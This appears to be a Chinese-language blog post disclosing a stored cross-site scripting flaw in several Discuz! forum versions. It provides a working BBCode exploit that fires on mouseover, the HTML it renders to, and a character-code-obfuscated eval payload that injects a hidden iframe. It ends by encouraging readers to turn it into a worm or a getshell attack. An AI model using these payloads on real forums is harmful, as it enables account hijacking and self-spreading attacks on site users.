Discuz!多版本爆存儲型XSS漏洞
XSS漏洞的測試案例分析如下:
2009年一次偶然間測試發現的此XSS漏洞,因為是存儲型的,我想大家應該知道它的危害吧。相隔這么多年Discuz不斷的更新版本,但此XSS漏洞依然存在。
在此我要感謝一下我的好朋友Jackal在09年的時候一起幫我測試漏洞的。當時我們一起測試的是Discuz6.0-Discuz7.2,不知道是不是通殺啊。沒有一個一個去測試。有條件的去測試一下吧。
發貼進入源碼模式,寫入如下的exp
- [email][url][img]http://www.linuxso.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]
上面代碼是以鼠標事件來觸發XSS的,剩下的大家可以自行發揮構造!
附上XSS完的源碼如下:
- <a href="mailto:"></a><a href="%5C%22http://qhkest.com" onmouseover="alert(/DZ-xss-0day/);" \"="" target="\"_blank\""><img src="http://qhkest.com%20onmouseover=alert%28/DZ-xss-0day/%29;" onload="thumbImg(this)" alt=""> </a><
我想你們一看就明白了吧!
漏洞證明:
本地測試結果:
Discuz! X2
以下應用華東耶穌的話:雞肋在于,要鼠標觸碰才能觸發,但是,鼠標觸碰還是概率很大很大的嘛。
把上面的alert(/DZ-XSS-0DAY/)換成
- eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,
- 121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,
- 101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,
- 34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,
- 102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,
- 48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,
- 84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,
- 105,108,100,40,102,41,59))
鼠標觸碰效果:
加密過程,就是10進制加密啦,如圖。
解密下看下代碼。
好了,希望看完的朋友能寫出個蠕蟲,或者寫個直接getshell的東西。我記得曾經有人寫過dz的xss直接getshell的。
Discuz和多版本爆存儲型XSS漏洞的介紹就結束了,有興趣的朋友請繼關注此類資源。
【編輯推薦】